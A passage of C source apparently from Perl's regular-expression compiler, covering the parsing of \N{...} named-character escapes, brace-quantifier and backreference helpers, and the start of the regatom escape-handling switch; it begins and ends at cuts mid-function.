/* This routine teases apart the various meanings of \N and returns
* accordingly. The input parameters constrain which meaning(s) is/are valid
* in the current context.
*
* Exactly one of <node_p> and <code_point_p> must be non-NULL.
*
* If <code_point_p> is not NULL, the context is expecting the result to be a
* single code point. If this \N instance turns out to a single code point,
* the function returns TRUE and sets *code_point_p to that code point.
*
* If <node_p> is not NULL, the context is expecting the result to be one of
* the things representable by a regnode. If this \N instance turns out to be
* one such, the function generates the regnode, returns TRUE and sets *node_p
* to point to the offset of that regnode into the regex engine program being
* compiled.
*
* If this instance of \N isn't legal in any context, this function will
* generate a fatal error and not return.
*
* On input, RExC_parse should point to the first char following the \N at the
* time of the call. On successful return, RExC_parse will have been updated
* to point to just after the sequence identified by this routine. Also
* *flagp has been updated as needed.
*
* When there is some problem with the current context and this \N instance,
* the function returns FALSE, without advancing RExC_parse, nor setting
* *node_p, nor *code_point_p, nor *flagp.
*
* If <cp_count> is not NULL, the caller wants to know the length (in code
* points) that this \N sequence matches. This is set, and the input is
* parsed for errors, even if the function returns FALSE, as detailed below.
*
* There are 6 possibilities here, as detailed in the next 6 paragraphs.
*
* Probably the most common case is for the \N to specify a single code point.
* *cp_count will be set to 1, and *code_point_p will be set to that code
* point.
*
* Another possibility is for the input to be an empty \N{}. This is no
* longer accepted, and will generate a fatal error.
*
* Another possibility is for a custom charnames handler to be in effect which
* translates the input name to an empty string. *cp_count will be set to 0.
* *node_p will be set to a generated NOTHING node.
*
* Still another possibility is for the \N to mean [^\n]. *cp_count will be
* set to 0. *node_p will be set to a generated REG_ANY node.
*
* The fifth possibility is that \N resolves to a sequence of more than one
* code points. *cp_count will be set to the number of code points in the
* sequence. *node_p will be set to a generated node returned by this
* function calling S_reg().
*
* The final possibility is that it is premature to be calling this function;
* the parse needs to be restarted. This can happen when this changes from
* /d to /u rules, or when the pattern needs to be upgraded to UTF-8. The
* latter occurs only when the fifth possibility would otherwise be in
* effect, and is because one of those code points requires the pattern to be
* recompiled as UTF-8. The function returns FALSE, and sets the
* RESTART_PARSE and NEED_UTF8 flags in *flagp, as appropriate. When this
* happens, the caller needs to desist from continuing parsing, and return
* this information to its caller. This is not set for when there is only one
* code point, as this can be called as part of an ANYOF node, and they can
* store above-Latin1 code points without the pattern having to be in UTF-8.
*
* For non-single-quoted regexes, the tokenizer has resolved character and
* sequence names inside \N{...} into their Unicode values, normalizing the
* result into what we should see here: '\N{U+c1.c2...}', where c1... are the
* hex-represented code points in the sequence. This is done there because
* the names can vary based on what charnames pragma is in scope at the time,
* so we need a way to take a snapshot of what they resolve to at the time of
* the original parse. [perl #56444].
*
* That parsing is skipped for single-quoted regexes, so here we may get
* '\N{NAME}', which is parsed now. If the single-quoted regex is something
* like '\N{U+41}', that code point is Unicode, and has to be translated into
* the native character set for non-ASCII platforms. The other possibilities
* are already native, so no translation is done. */
char * endbrace; /* points to '}' following the name */
char* p = RExC_parse; /* Temporary */
SV * substitute_parse = NULL;
char *orig_end;
char *save_start;
I32 flags;
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_GROK_BSLASH_N;
GET_RE_DEBUG_FLAGS;
assert(cBOOL(node_p) ^ cBOOL(code_point_p)); /* Exactly one should be set */
assert(! (node_p && cp_count)); /* At most 1 should be set */
if (cp_count) { /* Initialize return for the most common case */
*cp_count = 1;
}
/* The [^\n] meaning of \N ignores spaces and comments under the /x
* modifier. The other meanings do not, so use a temporary until we find
* out which we are being called with */
skip_to_be_ignored_text(pRExC_state, &p,
FALSE /* Don't force to /x */ );
/* Disambiguate between \N meaning a named character versus \N meaning
* [^\n]. The latter is assumed when the {...} following the \N is a legal
* quantifier, or if there is no '{' at all */
if (*p != '{' || regcurly(p)) {
RExC_parse = p;
if (cp_count) {
*cp_count = -1;
}
if (! node_p) {
return FALSE;
}
*node_p = reg_node(pRExC_state, REG_ANY);
*flagp |= HASWIDTH|SIMPLE;
MARK_NAUGHTY(1);
Set_Node_Length(REGNODE_p(*(node_p)), 1); /* MJD */
return TRUE;
}
/* The test above made sure that the next real character is a '{', but
* under the /x modifier, it could be separated by space (or a comment and
* \n) and this is not allowed (for consistency with \x{...} and the
* tokenizer handling of \N{NAME}). */
if (*RExC_parse != '{') {
vFAIL("Missing braces on \\N{}");
}
RExC_parse++; /* Skip past the '{' */
endbrace = (char *) memchr(RExC_parse, '}', RExC_end - RExC_parse);
if (! endbrace) { /* no trailing brace */
vFAIL2("Missing right brace on \\%c{}", 'N');
}
/* Here, we have decided it should be a named character or sequence. These
* imply Unicode semantics */
REQUIRE_UNI_RULES(flagp, FALSE);
/* \N{_} is what toke.c returns to us to indicate a name that evaluates to
* nothing at all (not allowed under strict) */
if (endbrace - RExC_parse == 1 && *RExC_parse == '_') {
RExC_parse = endbrace;
if (strict) {
RExC_parse++; /* Position after the "}" */
vFAIL("Zero length \\N{}");
}
if (cp_count) {
*cp_count = 0;
}
nextchar(pRExC_state);
if (! node_p) {
return FALSE;
}
*node_p = reg_node(pRExC_state, NOTHING);
return TRUE;
}
if (endbrace - RExC_parse < 2 || ! strBEGINs(RExC_parse, "U+")) {
/* Here, the name isn't of the form U+.... This can happen if the
* pattern is single-quoted, so didn't get evaluated in toke.c. Now
* is the time to find out what the name means */
const STRLEN name_len = endbrace - RExC_parse;
SV * value_sv; /* What does this name evaluate to */
SV ** value_svp;
const U8 * value; /* string of name's value */
STRLEN value_len; /* and its length */
/* RExC_unlexed_names is a hash of names that weren't evaluated by
* toke.c, and their values. Make sure is initialized */
if (! RExC_unlexed_names) {
RExC_unlexed_names = newHV();
}
/* If we have already seen this name in this pattern, use that. This
* allows us to only call the charnames handler once per name per
* pattern. A broken or malicious handler could return something
* different each time, which could cause the results to vary depending
* on if something gets added or subtracted from the pattern that
* causes the number of passes to change, for example */
if ((value_svp = hv_fetch(RExC_unlexed_names, RExC_parse,
name_len, 0)))
{
value_sv = *value_svp;
}
else { /* Otherwise we have to go out and get the name */
const char * error_msg = NULL;
value_sv = get_and_check_backslash_N_name(RExC_parse, endbrace,
UTF,
&error_msg);
if (error_msg) {
RExC_parse = endbrace;
vFAIL(error_msg);
}
/* If no error message, should have gotten a valid return */
assert (value_sv);
/* Save the name's meaning for later use */
if (! hv_store(RExC_unlexed_names, RExC_parse, name_len,
value_sv, 0))
{
Perl_croak(aTHX_ "panic: hv_store() unexpectedly failed");
}
}
/* Here, we have the value the name evaluates to in 'value_sv' */
value = (U8 *) SvPV(value_sv, value_len);
/* See if the result is one code point vs 0 or multiple */
if (value_len > 0 && value_len <= (UV) ((SvUTF8(value_sv))
? UTF8SKIP(value)
: 1))
{
/* Here, exactly one code point. If that isn't what is wanted,
* fail */
if (! code_point_p) {
RExC_parse = p;
return FALSE;
}
/* Convert from string to numeric code point */
*code_point_p = (SvUTF8(value_sv))
? valid_utf8_to_uvchr(value, NULL)
: *value;
/* Have parsed this entire single code point \N{...}. *cp_count
* has already been set to 1, so don't do it again. */
RExC_parse = endbrace;
nextchar(pRExC_state);
return TRUE;
} /* End of is a single code point */
/* Count the code points, if caller desires. The API says to do this
* even if we will later return FALSE */
if (cp_count) {
*cp_count = 0;
*cp_count = (SvUTF8(value_sv))
? utf8_length(value, value + value_len)
: value_len;
}
/* Fail if caller doesn't want to handle a multi-code-point sequence.
* But don't back the pointer up if the caller wants to know how many
* code points there are (they need to handle it themselves in this
* case). */
if (! node_p) {
if (! cp_count) {
RExC_parse = p;
}
return FALSE;
}
/* Convert this to a sub-pattern of the form "(?: ... )", and then call
* reg recursively to parse it. That way, it retains its atomicness,
* while not having to worry about any special handling that some code
* points may have. */
substitute_parse = newSVpvs("?:");
sv_catsv(substitute_parse, value_sv);
sv_catpv(substitute_parse, ")");
#ifdef EBCDIC
/* The value should already be native, so no need to convert on EBCDIC
* platforms.*/
assert(! RExC_recode_x_to_native);
#endif
}
else { /* \N{U+...} */
Size_t count = 0; /* code point count kept internally */
/* We can get to here when the input is \N{U+...} or when toke.c has
* converted a name to the \N{U+...} form. This include changing a
* name that evaluates to multiple code points to \N{U+c1.c2.c3 ...} */
RExC_parse += 2; /* Skip past the 'U+' */
/* Code points are separated by dots. The '}' terminates the whole
* thing. */
do { /* Loop until the ending brace */
UV cp = 0;
char * start_digit; /* The first of the current code point */
if (! isXDIGIT(*RExC_parse)) {
RExC_parse++;
vFAIL("Invalid hexadecimal number in \\N{U+...}");
}
start_digit = RExC_parse;
count++;
/* Loop through the hex digits of the current code point */
do {
/* Adding this digit will shift the result 4 bits. If that
* result would be above the legal max, it's overflow */
if (cp > MAX_LEGAL_CP >> 4) {
/* Find the end of the code point */
do {
RExC_parse ++;
} while (isXDIGIT(*RExC_parse) || *RExC_parse == '_');
/* Be sure to synchronize this message with the similar one
* in utf8.c */
vFAIL4("Use of code point 0x%.*s is not allowed; the"
" permissible max is 0x%" UVxf,
(int) (RExC_parse - start_digit), start_digit,
MAX_LEGAL_CP);
}
/* Accumulate this (valid) digit into the running total */
cp = (cp << 4) + READ_XDIGIT(RExC_parse);
/* READ_XDIGIT advanced the input pointer. Ignore a single
* underscore separator */
if (*RExC_parse == '_' && isXDIGIT(RExC_parse[1])) {
RExC_parse++;
}
} while (isXDIGIT(*RExC_parse));
/* Here, have accumulated the next code point */
if (RExC_parse >= endbrace) { /* If done ... */
if (count != 1) {
goto do_concat;
}
/* Here, is a single code point; fail if doesn't want that */
if (! code_point_p) {
RExC_parse = p;
return FALSE;
}
/* A single code point is easy to handle; just return it */
*code_point_p = UNI_TO_NATIVE(cp);
RExC_parse = endbrace;
nextchar(pRExC_state);
return TRUE;
}
/* Here, the only legal thing would be a multiple character
* sequence (of the form "\N{U+c1.c2. ... }". So the next
* character must be a dot (and the one after that can't be the
* endbrace, or we'd have something like \N{U+100.} ) */
if (*RExC_parse != '.' || RExC_parse + 1 >= endbrace) {
RExC_parse += (RExC_orig_utf8) /* point to after 1st invalid */
? UTF8SKIP(RExC_parse)
: 1;
if (RExC_parse >= endbrace) { /* Guard against malformed utf8 */
RExC_parse = endbrace;
}
vFAIL("Invalid hexadecimal number in \\N{U+...}");
}
/* Here, looks like its really a multiple character sequence. Fail
* if that's not what the caller wants. But continue with counting
* and error checking if they still want a count */
if (! node_p && ! cp_count) {
return FALSE;
}
/* What is done here is to convert this to a sub-pattern of the
* form \x{char1}\x{char2}... and then call reg recursively to
* parse it (enclosing in "(?: ... )" ). That way, it retains its
* atomicness, while not having to worry about special handling
* that some code points may have. We don't create a subpattern,
* but go through the motions of code point counting and error
* checking, if the caller doesn't want a node returned. */
if (node_p && count == 1) {
substitute_parse = newSVpvs("?:");
}
do_concat:
if (node_p) {
/* Convert to notation the rest of the code understands */
sv_catpvs(substitute_parse, "\\x{");
sv_catpvn(substitute_parse, start_digit,
RExC_parse - start_digit);
sv_catpvs(substitute_parse, "}");
}
/* Move to after the dot (or ending brace the final time through.)
* */
RExC_parse++;
count++;
} while (RExC_parse < endbrace);
if (! node_p) { /* Doesn't want the node */
assert (cp_count);
*cp_count = count;
return FALSE;
}
sv_catpvs(substitute_parse, ")");
#ifdef EBCDIC
/* The values are Unicode, and therefore have to be converted to native
* on a non-Unicode (meaning non-ASCII) platform. */
RExC_recode_x_to_native = 1;
#endif
}
/* Here, we have the string the name evaluates to, ready to be parsed,
* stored in 'substitute_parse' as a series of valid "\x{...}\x{...}"
* constructs. This can be called from within a substitute parse already.
* The error reporting mechanism doesn't work for 2 levels of this, but the
* code above has validated this new construct, so there should be no
* errors generated by the below. And this isn' an exact copy, so the
* mechanism to seamlessly deal with this won't work, so turn off warnings
* during it */
save_start = RExC_start;
orig_end = RExC_end;
RExC_parse = RExC_start = SvPVX(substitute_parse);
RExC_end = RExC_parse + SvCUR(substitute_parse);
TURN_OFF_WARNINGS_IN_SUBSTITUTE_PARSE;
*node_p = reg(pRExC_state, 1, &flags, depth+1);
/* Restore the saved values */
RESTORE_WARNINGS;
RExC_start = save_start;
RExC_parse = endbrace;
RExC_end = orig_end;
#ifdef EBCDIC
RExC_recode_x_to_native = 0;
#endif
SvREFCNT_dec_NN(substitute_parse);
if (! *node_p) {
RETURN_FAIL_ON_RESTART(flags, flagp);
FAIL2("panic: reg returned failure to grok_bslash_N, flags=%#" UVxf,
(UV) flags);
}
*flagp |= flags&(HASWIDTH|SPSTART|SIMPLE|POSTPONED);
nextchar(pRExC_state);
return TRUE;
}
PERL_STATIC_INLINE U8
S_compute_EXACTish(RExC_state_t *pRExC_state)
{
U8 op;
PERL_ARGS_ASSERT_COMPUTE_EXACTISH;
if (! FOLD) {
return (LOC)
? EXACTL
: EXACT;
}
op = get_regex_charset(RExC_flags);
if (op >= REGEX_ASCII_RESTRICTED_CHARSET) {
op--; /* /a is same as /u, and map /aa's offset to what /a's would have
been, so there is no hole */
}
return op + EXACTF;
}
STATIC bool
S_new_regcurly(const char *s, const char *e)
{
/* This is a temporary function designed to match the most lenient form of
* a {m,n} quantifier we ever envision, with either number omitted, and
* spaces anywhere between/before/after them.
*
* If this function fails, then the string it matches is very unlikely to
* ever be considered a valid quantifier, so we can allow the '{' that
* begins it to be considered as a literal */
bool has_min = FALSE;
bool has_max = FALSE;
PERL_ARGS_ASSERT_NEW_REGCURLY;
if (s >= e || *s++ != '{')
return FALSE;
while (s < e && isSPACE(*s)) {
s++;
}
while (s < e && isDIGIT(*s)) {
has_min = TRUE;
s++;
}
while (s < e && isSPACE(*s)) {
s++;
}
if (*s == ',') {
s++;
while (s < e && isSPACE(*s)) {
s++;
}
while (s < e && isDIGIT(*s)) {
has_max = TRUE;
s++;
}
while (s < e && isSPACE(*s)) {
s++;
}
}
return s < e && *s == '}' && (has_min || has_max);
}
/* Parse backref decimal value, unless it's too big to sensibly be a backref,
* in which case return I32_MAX (rather than possibly 32-bit wrapping) */
static I32
S_backref_value(char *p, char *e)
{
const char* endptr = e;
UV val;
if (grok_atoUV(p, &val, &endptr) && val <= I32_MAX)
return (I32)val;
return I32_MAX;
}
/*
- regatom - the lowest level
Try to identify anything special at the start of the current parse position.
If there is, then handle it as required. This may involve generating a
single regop, such as for an assertion; or it may involve recursing, such as
to handle a () structure.
If the string doesn't start with something special then we gobble up
as much literal text as we can. If we encounter a quantifier, we have to
back off the final literal character, as that quantifier applies to just it
and not to the whole string of literals.
Once we have been able to handle whatever type of thing started the
sequence, we return the offset into the regex engine program being compiled
at which any next regnode should be placed.
Returns 0, setting *flagp to TRYAGAIN if reg() returns 0 with TRYAGAIN.
Returns 0, setting *flagp to RESTART_PARSE if the parse needs to be
restarted, or'd with NEED_UTF8 if the pattern needs to be upgraded to UTF-8
Otherwise does not return 0.
Note: we have to be careful with escapes, as they can be both literal
and special, and in the case of \10 and friends, context determines which.
A summary of the code structure is:
switch (first_byte) {
cases for each special:
handle this special;
break;
case '\\':
switch (2nd byte) {
cases for each unambiguous special:
handle this special;
break;
cases for each ambigous special/literal:
disambiguate;
if (special) handle here
else goto defchar;
default: // unambiguously literal:
goto defchar;
}
default: // is a literal char
// FALL THROUGH
defchar:
create EXACTish node for literal;
while (more input and node isn't full) {
switch (input_byte) {
cases for each special;
make sure parse pointer is set so that the next call to
regatom will see this special first
goto loopdone; // EXACTish node terminated by prev. char
default:
append char to EXACTISH node;
}
get next input byte;
}
loopdone:
}
return the generated node;
Specifically there are two separate switches for handling
escape sequences, with the one for handling literal escapes requiring
a dummy entry for all of the special escapes that are actually handled
by the other.
*/
STATIC regnode_offset
S_regatom(pTHX_ RExC_state_t *pRExC_state, I32 *flagp, U32 depth)
{
dVAR;
regnode_offset ret = 0;
I32 flags = 0;
char *parse_start;
U8 op;
int invert = 0;
U8 arg;
GET_RE_DEBUG_FLAGS_DECL;
*flagp = WORST; /* Tentatively. */
DEBUG_PARSE("atom");
PERL_ARGS_ASSERT_REGATOM;
tryagain:
parse_start = RExC_parse;
assert(RExC_parse < RExC_end);
switch ((U8)*RExC_parse) {
case '^':
RExC_seen_zerolen++;
nextchar(pRExC_state);
if (RExC_flags & RXf_PMf_MULTILINE)
ret = reg_node(pRExC_state, MBOL);
else
ret = reg_node(pRExC_state, SBOL);
Set_Node_Length(REGNODE_p(ret), 1); /* MJD */
break;
case '$':
nextchar(pRExC_state);
if (*RExC_parse)
RExC_seen_zerolen++;
if (RExC_flags & RXf_PMf_MULTILINE)
ret = reg_node(pRExC_state, MEOL);
else
ret = reg_node(pRExC_state, SEOL);
Set_Node_Length(REGNODE_p(ret), 1); /* MJD */
break;
case '.':
nextchar(pRExC_state);
if (RExC_flags & RXf_PMf_SINGLELINE)
ret = reg_node(pRExC_state, SANY);
else
ret = reg_node(pRExC_state, REG_ANY);
*flagp |= HASWIDTH|SIMPLE;
MARK_NAUGHTY(1);
Set_Node_Length(REGNODE_p(ret), 1); /* MJD */
break;
case '[':
{
char * const oregcomp_parse = ++RExC_parse;
ret = regclass(pRExC_state, flagp, depth+1,
FALSE, /* means parse the whole char class */
TRUE, /* allow multi-char folds */
FALSE, /* don't silence non-portable warnings. */
(bool) RExC_strict,
TRUE, /* Allow an optimized regnode result */
NULL);
if (ret == 0) {
RETURN_FAIL_ON_RESTART_FLAGP(flagp);
FAIL2("panic: regclass returned failure to regatom, flags=%#" UVxf,
(UV) *flagp);
}
if (*RExC_parse != ']') {
RExC_parse = oregcomp_parse;
vFAIL("Unmatched [");
}
nextchar(pRExC_state);
Set_Node_Length(REGNODE_p(ret), RExC_parse - oregcomp_parse + 1); /* MJD */
break;
}
case '(':
nextchar(pRExC_state);
ret = reg(pRExC_state, 2, &flags, depth+1);
if (ret == 0) {
if (flags & TRYAGAIN) {
if (RExC_parse >= RExC_end) {
/* Make parent create an empty node if needed. */
*flagp |= TRYAGAIN;
return(0);
}
goto tryagain;
}
RETURN_FAIL_ON_RESTART(flags, flagp);
FAIL2("panic: reg returned failure to regatom, flags=%#" UVxf,
(UV) flags);
}
*flagp |= flags&(HASWIDTH|SPSTART|SIMPLE|POSTPONED);
break;
case '|':
case ')':
if (flags & TRYAGAIN) {
*flagp |= TRYAGAIN;
return 0;
}
vFAIL("Internal urp");
/* Supposed to be caught earlier. */
break;
case '?':
case '+':
case '*':
RExC_parse++;
vFAIL("Quantifier follows nothing");
break;
case '\\':
/* Special Escapes
This switch handles escape sequences that resolve to some kind
of special regop and not to literal text. Escape sequences that
resolve to literal text are handled below in the switch marked
"Literal Escapes".
Every entry in this switch *must* have a corresponding entry
in the literal escape switch. However, the opposite is not
required, as the default for this switch is to jump to the
literal text handling code.
*/
RExC_parse++;
switch ((U8)*RExC_parse) {
/* Special Escapes */
case 'A':
RExC_seen_zerolen++;
ret = reg_node(pRExC_state, SBOL);
/* SBOL is shared with /^/ so we set the flags so we can tell
* /\A/ from /^/ in split. */
FLAGS(REGNODE_p(ret)) = 1;
*flagp |= SIMPLE;
goto finish_meta_pat;
case 'G':
ret = reg_node(pRExC_state, GPOS);
RExC_seen |= REG_GPOS_SEEN;
*flagp |= SIMPLE;
goto finish_meta_pat;
case 'K':
RExC_seen_zerolen++;
ret = reg_node(pRExC_state, KEEPS);
*flagp |= SIMPLE;
/* XXX:dmq : disabling in-place substitution seems to
* be necessary here to avoid cases of memory corruption, as
* with: C<$_="x" x 80; s/x\K/y/> -- rgs
*/
RExC_seen |= REG_LOOKBEHIND_SEEN;
goto finish_meta_pat;
case 'Z':
ret = reg_node(pRExC_state, SEOL);
*flagp |= SIMPLE;
RExC_seen_zerolen++; /* Do not optimize RE away */
goto finish_meta_pat;
case 'z':
ret = reg_node(pRExC_state, EOS);
*flagp |= SIMPLE;
RExC_seen_zerolen++; /* Do not optimize RE away */
goto finish_meta_pat;
case 'C':
vFAIL("\\C no longer supported");
case 'X':
ret = reg_node(pRExC_state, CLUMP);
*flagp |= HASWIDTH;
goto finish_meta_pat;
case 'W':
invert = 1;
/* FALLTHROUGH */
case 'w':
arg = ANYOF_WORDCHAR;
goto join_posix;
case 'B':
invert = 1;
/* FALLTHROUGH */
case 'b':
{
U8 flags = 0;
regex_charset charset = get_regex_charset(RExC_flags);
RExC_seen_zerolen++;
RExC_seen |= REG_LOOKBEHIND_SEEN;
op = BOUND + charset;
if (RExC_parse >= RExC_end || *(RExC_parse + 1) != '{') {
flags = TRADITIONAL_BOUND;
if (op > BOUNDA) { /* /aa is same as /a */
op = BOUNDA;
}
}
else {
STRLEN length;
char name = *RExC_parse;
char * endbrace = NULL;
RExC_parse += 2;
endbrace = (char *) memchr(RExC_parse, '}', RExC_end - RExC_parse);
if (! endbrace) {
vFAIL2("Missing right brace on \\%c{}", name);
}
/* XXX Need to decide whether to take spaces or not. Should be
* consistent with \p{}, but that currently is SPACE, which
* means vertical too, which seems wrong
* while (isBLANK(*RExC_parse)) {
RExC_parse++;
}*/
if (endbrace == RExC_parse) {
RExC_parse++; /* After the '}' */
vFAIL2("Empty \\%c{}", name);
}
length = endbrace - RExC_parse;
/*while (isBLANK(*(RExC_parse + length - 1))) {
length--;
}*/
switch (*RExC_parse) {
case 'g':
if ( length != 1
&& (memNEs(RExC_parse + 1, length - 1, "cb")))
{
goto bad_bound_type;
}
flags = GCB_BOUND;
break;
case 'l':
if (length != 2 || *(RExC_parse + 1) != 'b') {
goto bad_bound_type;
}
flags = LB_BOUND;
break;
case 's':
if (length != 2 || *(RExC_parse + 1) != 'b') {
goto bad_bound_type;
}
flags = SB_BOUND;
break;
case 'w':
if (length != 2 || *(RExC_parse + 1) != 'b') {
goto bad_bound_type;
}
flags = WB_BOUND;
break;
default:
bad_bound_type:
RExC_parse = endbrace;
vFAIL2utf8f(
"'%" UTF8f "' is an unknown bound type",
UTF8fARG(UTF, length, endbrace - length));
NOT_REACHED; /*NOTREACHED*/
}
RExC_parse = endbrace;
REQUIRE_UNI_RULES(flagp, 0);
if (op == BOUND) {
op = BOUNDU;
}
else if (op >= BOUNDA) { /* /aa is same as /a */
op = BOUNDU;
length += 4;
/* Don't have to worry about UTF-8, in this message because
* to get here the contents of the \b must be ASCII */
ckWARN4reg(RExC_parse + 1, /* Include the '}' in msg */
"Using /u for '%.*s' instead of /%s",
(unsigned) length,
endbrace - length + 1,
(charset == REGEX_ASCII_RESTRICTED_CHARSET)
? ASCII_RESTRICT_PAT_MODS
: ASCII_MORE_RESTRICT_PAT_MODS);
}
}
if (op == BOUND) {
RExC_seen_d_op = TRUE;
}
else if (op == BOUNDL) {
RExC_contains_locale = 1;
}
if (invert) {
op += NBOUND - BOUND;
}
ret = reg_node(pRExC_state, op);
FLAGS(REGNODE_p(ret)) = flags;
*flagp |= SIMPLE;
goto finish_meta_pat;
}
case 'D':
invert = 1;
/* FALLTHROUGH */
case 'd':
arg = ANYOF_DIGIT;
if (! DEPENDS_SEMANTICS) {
goto join_posix;
}
/* \d doesn't have any matches in the upper Latin1 range, hence /d
* is equivalent to /u. Changing to /u saves some branches at
* runtime */
op = POSIXU;
goto join_posix_op_known;
case 'R':
ret = reg_node(pRExC_state, LNBREAK);
*flagp |= HASWIDTH|SIMPLE;
goto finish_meta_pat;
case 'H':
invert = 1;
/* FALLTHROUGH */
case 'h':
arg = ANYOF_BLANK;
op = POSIXU;
goto join_posix_op_known;
case 'V':
invert = 1;
/* FALLTHROUGH */
case 'v':
arg = ANYOF_VERTWS;
op = POSIXU;
goto join_posix_op_known;
case 'S':
invert = 1;
/* FALLTHROUGH */
case 's':
arg = ANYOF_SPACE;
join_posix:
op = POSIXD + get_regex_charset(RExC_flags);
if (op > POSIXA) { /* /aa is same as /a */
op = POSIXA;
}
else if (op == POSIXL) {
RExC_contains_locale = 1;
}
else if (op == POSIXD) {
RExC_seen_d_op = TRUE;
}
join_posix_op_known:
if (invert) {
op += NPOSIXD - POSIXD;
}
ret = reg_node(pRExC_state, op);
FLAGS(REGNODE_p(ret)) = namedclass_to_classnum(arg);
*flagp |= HASWIDTH|SIMPLE;
/* FALLTHROUGH */
finish_meta_pat:
if ( UCHARAT(RExC_parse + 1) == '{'
&& UNLIKELY(! new_regcurly(RExC_parse + 1, RExC_end)))
{
RExC_parse += 2;
vFAIL("Unescaped left brace in regex is illegal here");
}
nextchar(pRExC_state);
Set_Node_Length(REGNODE_p(ret), 2); /* MJD */
break;
case 'p':
case 'P':
RExC_parse--;
ret = regclass(pRExC_state, flagp, depth+1,
TRUE, /* means just parse this element */
FALSE, /* don't allow multi-char folds */
FALSE, /* don't silence non-portable warnings. It
would be a bug if these returned
non-portables */
(bool) RExC_strict,
TRUE, /* Allow an optimized regnode result */
NULL);
RETURN_FAIL_ON_RESTART_FLAGP(flagp);
/* regclass() can only return RESTART_PARSE and NEED_UTF8 if
* multi-char folds are allowed. */
if (!ret)
FAIL2("panic: regclass returned failure to regatom, flags=%#" UVxf,
(UV) *flagp);
RExC_parse--;
Set_Node_Offset(REGNODE_p(ret), parse_start);
Set_Node_Cur_Length(REGNODE_p(ret), parse_start - 2);
nextchar(pRExC_state);
break;
case 'N':
/* Handle \N, \N{} and \N{NAMED SEQUENCE} (the latter meaning the
* \N{...} evaluates to a sequence of more than one code points).
* The function call below returns a regnode, which is our result.
* The parameters cause it to fail if the \N{} evaluates to a
* single code point; we handle those like any other literal. The
* reason that the multicharacter case is handled here and not as
* part of the EXACtish code is because of quantifiers. In
* /\N{BLAH}+/, the '+' applies to the whole thing, and doing it
* this way makes that Just Happen. dmq.
* join_exact() will join this up with adjacent EXACTish nodes
* later on, if appropriate. */
++RExC_parse;
if (grok_bslash_N(pRExC_state,
&ret, /* Want a regnode returned */
NULL, /* Fail if evaluates to a single code
point */
NULL, /* Don't need a count of how many code
points */
flagp,
RExC_strict,
depth)
) {
break;
}
RETURN_FAIL_ON_RESTART_FLAGP(flagp);
/* Here, evaluates to a single code point. Go get that */
RExC_parse = parse_start;
goto defchar;
case 'k': /* Handle \k<NAME> and \k'NAME' */
parse_named_seq:
{
char ch;
if ( RExC_parse >= RExC_end - 1
|| (( ch = RExC_parse[1]) != '<'
&& ch != '\''
&& ch != '{'))
{
RExC_parse++;
/* diag_listed_as: Sequence \%s... not terminated in regex; marked by <-- HERE in m/%s/ */
vFAIL2("Sequence %.2s... not terminated", parse_start);
} else {
RExC_parse += 2;
ret = handle_named_backref(pRExC_state,
flagp,
parse_start,
(ch == '<')
? '>'
: (ch == '{')
? '}'
: '\'');
}
break;
}
case 'g':
case '1': case '2': case '3': case '4':
case '5': case '6': case '7': case '8': case '9':
{
I32 num;
bool hasbrace = 0;
if (*RExC_parse == 'g') {
bool isrel = 0;
RExC_parse++;
if (*RExC_parse == '{') {
RExC_parse++;
hasbrace = 1;
}
if (*RExC_parse == '-') {
RExC_parse++;
isrel = 1;
}
if (hasbrace && !isDIGIT(*RExC_parse)) {
if (isrel) RExC_parse--;
RExC_parse -= 2;
goto parse_named_seq;
}
if (RExC_parse >= RExC_end) {
goto unterminated_g;
}
num = S_backref_value(RExC_parse, RExC_end);
if (num == 0)
vFAIL("Reference to invalid group 0");
else if (num == I32_MAX) {
if (isDIGIT(*RExC_parse))
vFAIL("Reference to nonexistent group");
else
unterminated_g:
vFAIL("Unterminated \\g... pattern");
}
if (isrel) {
num = RExC_npar - num;
if (num < 1)
vFAIL("Reference to nonexistent or unclosed group");
}
}
else {
num = S_backref_value(RExC_parse, RExC_end);
/* bare \NNN might be backref or octal - if it is larger
* than or equal RExC_npar then it is assumed to be an
* octal escape. Note RExC_npar is +1 from the actual
* number of parens. */
/* Note we do NOT check if num == I32_MAX here, as that is
* handled by the RExC_npar check */
if (
/* any numeric escape < 10 is always a backref */
num > 9
/* any numeric escape < RExC_npar is a backref */
&& num >= RExC_npar
/* cannot be an octal escape if it starts with 8 */
&& *RExC_parse != '8'
/* cannot be an octal escape it it starts with 9 */
&& *RExC_parse != '9'
) {
/* Probably not meant to be a backref, instead likely
* to be an octal character escape, e.g. \35 or \777.
* The above logic should make it obvious why using
* octal escapes in patterns is problematic. - Yves */
RExC_parse = parse_start;
goto defchar;
}
}
/* At this point RExC_parse points at a numeric escape like
* \12 or \88 or something similar, which we should NOT treat
* as an octal escape. It may or may not be a valid backref
* escape. For instance \88888888 is unlikely to be a valid
* backref. */
while (isDIGIT(*RExC_parse))
RExC_parse++;
if (hasbrace) {
if (*RExC_parse != '}')
vFAIL("Unterminated \\g{...} pattern");
RExC_parse++;
}
if (num >= (I32)RExC_npar) {
/* It might be a forward reference; we can't fail until we
* know, by completing the parse to get all the groups, and
* then reparsing */
if (ALL_PARENS_COUNTED) {
if (num >= RExC_total_parens) {
vFAIL("Reference to nonexistent group");
}
}
else {
REQUIRE_PARENS_PASS;
}
}
RExC_sawback = 1;
ret = reganode(pRExC_state,
((! FOLD)
? REF
: (ASCII_FOLD_RESTRICTED)
? REFFA
: (AT_LEAST_UNI_SEMANTICS)
? REFFU
: (LOC)
? REFFL
: REFF),
num);
if (OP(REGNODE_p(ret)) == REFF) {
RExC_seen_d_op = TRUE;
}
*flagp |= HASWIDTH;
/* override incorrect value set in reganode MJD */
Set_Node_Offset(REGNODE_p(ret), parse_start);
Set_Node_Cur_Length(REGNODE_p(ret), parse_start-1);
skip_to_be_ignored_text(pRExC_state, &RExC_parse,
FALSE /* Don't force to /x */ );
}
break;
case '\0':
if (RExC_parse >= RExC_end)
FAIL("Trailing \\");
/* FALLTHROUGH */
default:
/* Do not generate "unrecognized" warnings here, we fall
back into the quick-grab loop below */
RExC_parse = parse_start;
goto defchar;
} /* end of switch on a \foo sequence */
break;
case '#':
/* '#' comments should have been spaced over before this function was
* called */
assert((RExC_flags & RXf_PMf_EXTENDED) == 0);
/*
if (RExC_flags & RXf_PMf_EXTENDED) {
RExC_parse = reg_skipcomment( pRExC_state, RExC_parse );
if (RExC_parse < RExC_end)
goto tryagain;
}
*/
/* FALLTHROUGH */
default:
defchar: {
/* Here, we have determined that the next thing is probably a
* literal character. RExC_parse points to the first byte of its
